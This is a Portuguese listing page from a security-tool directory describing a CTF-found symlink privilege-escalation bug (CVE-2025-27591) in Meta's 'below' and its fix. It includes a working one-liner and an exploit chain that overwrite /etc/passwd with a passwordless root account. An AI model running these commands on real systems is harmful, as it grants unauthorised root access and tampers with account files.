Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27591-Meta-below-LPE — CVE-2025-27591 – Meta abaixo seguimento de symlink escalonamento local de privilégios (HackTheBox CTF) | Kitploit
Ferramentas/GitHubGitHub/rippsec/cve-2025-27591-meta-below-lpe
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoMovimento LateralCTFExploração de Binários
GitHubrippsec/cve-2025-27591-meta-below-lpe

CVE-2025-27591-Meta-below-LPE

CVE-2025-27591 – Meta abaixo seguimento de symlink escalonamento local de privilégios (HackTheBox CTF)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
8há 4 mesesAinda não revisado

CVE-2025-27591 — Escalação Local de Privilégios via Symlink no below da Meta

Visão Geral

CampoDetalhes
CVECVE-2025-27591
SoftwareMeta below (monitor de recursos do sistema)
Versões Afetadas< 0.9.0
VulnerabilidadeSeguir symlink → sobrescrita arbitrária de arquivos como root
AutenticaçãoUsuário local com acesso sudo ao below
ImpactoEscalação local de privilégios para root
ContextoDescoberto durante o CTF HackTheBox

Descrição

A ferramenta de monitoramento de recursos do sistema below (da Meta Platforms, Inc.) contém uma falha em seu mecanismo de registro de erros. Quando invocada via sudo, ela define forçosamente permissões 0666 em seus arquivos de log localizados em /var/log/below/ sem antes verificar se o caminho de destino é um symlink. Isso permite que um atacante local substitua o arquivo de log por um symlink apontando para qualquer arquivo gravável por root, efetivamente sobrescrevendo-o com conteúdo controlado.

Detalhes Técnicos

Causa Raiz

O código de registro em below < 0.9.0 executa estas operações em sequência quando executado como root:

  1. Determina o caminho do log: /var/log/below/error_root.log
  2. Cria ou abre o arquivo
  3. Chama chmod(path, 0o666) — sem verificar se é um symlink
  4. Escreve a mensagem de erro no caminho

Na etapa 4, se o caminho foi substituído por um symlink antes da execução, a gravação vai para o alvo do symlink.

Cadeia de Exploração

root@kitploit:~
Local user
    │
    ▼
Remove /var/log/below/error_root.log
    │
    ▼
Create symlink: /var/log/below/error_root.log → /etc/passwd
    │
    ▼
Trigger error via: sudo /usr/bin/below replay --time "invalid"
    │  (below opens the "log file", chmod 0666 hits /etc/passwd, writes error)
    ▼
/etc/passwd is now world-writable
    │
    ▼
Append rogue root entry: rooted::0:0:root:/root:/bin/bash
    │
    ▼
su rooted → root shell

Por que --time "invalid" Funciona

Passar uma string de tempo inválida força o below a registrar uma mensagem de erro. O caminho de erro alcança o código de registro que grava cegamente no arquivo, que agora é o nosso symlink.

Uso

root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Pré-requisito: O usuário atual deve ter privilégios sudo para executar /usr/bin/below.

Comando de uma linha

root@kitploit:~
rm -f /var/log/below/error_root.log; \
ln -s /etc/passwd /var/log/below/error_root.log; \
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1; \
echo 'rooted::0:0:root:/root:/bin/bash' > /var/log/below/error_root.log; \
su rooted

Prova de Conceito

root@kitploit:~
$ whoami
lowpriv
$ ./exploit.sh
# whoami
root

Correção

A vulnerabilidade foi corrigida na versão 0.9.0 do below. A correção introduz uma verificação de symlink antes de qualquer operação de arquivo no caminho de registro.

Referências

  • Entrada NVD
  • GitHub do Meta below
Baixar ferramenta